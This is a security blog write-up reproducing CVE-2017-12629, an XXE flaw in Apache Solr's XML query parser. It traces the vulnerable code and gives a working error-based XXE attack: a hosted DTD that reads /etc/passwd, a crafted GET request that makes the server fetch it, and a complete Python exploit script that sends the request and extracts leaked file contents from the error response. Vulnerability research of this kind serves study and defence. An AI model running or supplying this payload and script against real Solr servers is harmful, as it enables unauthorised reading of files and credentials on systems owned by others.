Apache Solr - XXE & RCE (1)
0x01 Foreword
There is already a lot of analysis and reproduction of this bug online. I am writing this article mainly for two reasons:
- to analyse the vulnerability in more detail from my own perspective
- to write a formulaic exploit plug-in. I have not decided on a concrete framework yet, but starting with the vulnerability in this article I will write my exploit code in that form (something like a bugscan plug-in); it is divided into detection +
0x02 Installing Solr from source
If you only want to reproduce the bug, the binaries provided on the official site are enough. Here Solr is installed from source so that breakpoints and code analysis are possible later on.
Source download (official archive):
https://archive.apache.org/dist/lucene/solr/7.0.1/
Building from source requires ant. Some of the download links used by the build fail and make the build stop; check the failing links (for example http that has to be changed to https, or a library whose link has to be replaced).
0x03 Debugging
Visit the Solr admin UI:
http://127.0.0.1:8983/
Following the analysis at
https://paper.seebug.org/425/
the vulnerable code is located in
/solr/src/lucene/queryparser/src/java/org/apache/lucene/queryparser/xml/CoreParser.java
The XML is parsed by the parseXML method, which uses a DocumentBuilder and hands the input straight to its parse method. The DocumentBuilderFactory is left at its defaults, so the DOCTYPE and external entities in the submitted document are resolved, which is what makes the XXE possible.
Create a collection (I had already created one named test earlier, and the requests below use it).
0x04 Reproducing the vulnerability
Following the vulhub PoC:
https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE
The PoC uses an error-based XXE payload. The interface already returns parser errors in its response, so the trick is to make the parser fail with an error message that contains the data we want to read. The specific payload follows the cheat sheet at
https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html
(1) On the attacker-controlled server, save the following as test.dtd (the %file entity is expanded into the path of a second entity that cannot exist, so the parser's "file not found" error carries the file contents; note the &#x25; escape, which is required because a literal % inside an entity value in the external DTD would be taken as a parameter-entity reference and make the DTD ill-formed):
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
(2) Serve the directory containing test.dtd over HTTP so that the target can fetch it remotely (the request below fetches it from 127.0.0.1:8088).
(3) Send the following request with Burp. The query is passed in the q parameter with defType=xmlparser; the % of the %ext; parameter-entity reference is URL-encoded as %25 so it survives decoding:
GET /solr/test/select?q=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+message+[<!ENTITY+%25+ext+SYSTEM+"http%3a//127.0.0.1%3a8088/test.dtd">+%25ext%3b]><message></message>&wt=xml&defType=xmlparser HTTP/1.1
Host: 192.168.52.129:8983
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
The attack succeeds: the error message in the response contains the contents of /etc/passwd.
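The three steps above, turned into a small helper in the "detection + exploitation" spirit of the foreword. This is an added example, not code from the original post, from vulhub or from Solr: the function names (build_dtd, build_query_xml, build_request_url, extract_leaked_file) are mine, and the SAMPLE_RESPONSE is a constructed stand-in shaped like a Solr wt=xml error response, not a captured one. It generates the DTD and the exact request shown above (with the parameter-entity % correctly encoded as %25) and pulls the leaked file out of the FileNotFoundException text that the error-based payload forces into the response.

```python
"""Error-based XXE helper for Solr's xmlparser query parser (CVE-2017-12629).

Added example; names and the sample response below are assumptions, not Solr's own.
"""
import re
import urllib.error
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET


def build_dtd(target_file="/etc/passwd"):
    """Return the external DTD to host as test.dtd.

    %file is expanded into the URL of a second entity whose path cannot exist,
    so the parser's FileNotFoundException message carries the file contents.
    &#x25; is used instead of a literal % inside the entity value, otherwise the
    external DTD is ill-formed.
    """
    return (
        f'<!ENTITY % file SYSTEM "file://{target_file}">\n'
        '<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM \'file:///nonexistent/%file;\'>">\n'
        "%eval;\n"
        "%error;\n"
    )


def build_query_xml(dtd_url):
    """The q parameter: a document whose DOCTYPE loads the attacker's DTD."""
    return (
        '<?xml version="1.0" ?>'
        f'<!DOCTYPE message [<!ENTITY % ext SYSTEM "{dtd_url}"> %ext;]>'
        "<message></message>"
    )


def build_request_url(solr_base, core, dtd_url):
    """Full select URL; urlencode turns the % of %ext; into %25 and spaces into +."""
    params = {"q": build_query_xml(dtd_url), "wt": "xml", "defType": "xmlparser"}
    return f"{solr_base.rstrip('/')}/solr/{core}/select?" + urllib.parse.urlencode(params)


# Leaked data sits between the fake /nonexistent/ prefix and Java's FileNotFoundException suffix.
_LEAK_RE = re.compile(r"/nonexistent/(.*?)\s*\(No such file or directory\)", re.S)


def extract_leaked_file(response_body):
    """Return the leaked file contents from an error response, or None if nothing leaked.

    With wt=xml Solr puts the exception text in <str name="msg">; if the body is not
    well-formed XML the regex is applied to the raw body instead.
    """
    text = response_body
    try:
        msg = ET.fromstring(response_body).find(".//str[@name='msg']")
        if msg is not None and msg.text:
            text = msg.text
    except ET.ParseError:
        pass
    m = _LEAK_RE.search(text)
    return m.group(1) if m else None


# Constructed sample of what a vulnerable instance answers (assumption, not a real capture).
SAMPLE_RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
<response>
<lst name="responseHeader"><int name="status">500</int><int name="QTime">12</int></lst>
<lst name="error">
<str name="msg">java.io.FileNotFoundException: /nonexistent/root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin (No such file or directory)</str>
<int name="code">500</int>
</lst>
</response>
"""


if __name__ == "__main__":
    import sys

    # Usage: python3 solr_xxe.py http://192.168.52.129:8983 test http://127.0.0.1:8088/test.dtd
    # test.dtd (the output of build_dtd()) must already be served at that URL.
    base, core, dtd_url = sys.argv[1:4]
    try:
        body = urllib.request.urlopen(build_request_url(base, core, dtd_url), timeout=10).read()
    except urllib.error.HTTPError as e:
        body = e.read()  # the parser error comes back with HTTP 500; the body is still useful
    print(extract_leaked_file(body.decode("utf-8", "replace")) or "no leak found")
```

Detection is simply "does extract_leaked_file return something": a patched Solr (or one whose DocumentBuilderFactory disallows DOCTYPE declarations) never fetches the DTD and never produces the /nonexistent/ error, so the function returns None.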
0x05 Tracing the call chain
Set a breakpoint in parseXML and walk up the stack: parseXML is called by the parse method of CoreParser,
which in turn is called from XmlQParser.
The analysis stalls here. Above this level the problem is the architecture; I am not familiar enough with the request-processing architecture to read it, so I will leave it at that for now. I only know the location of the vulnerable point; as for what triggers the path that finally reaches it, I will have to analyse it again once I am familiar with the code.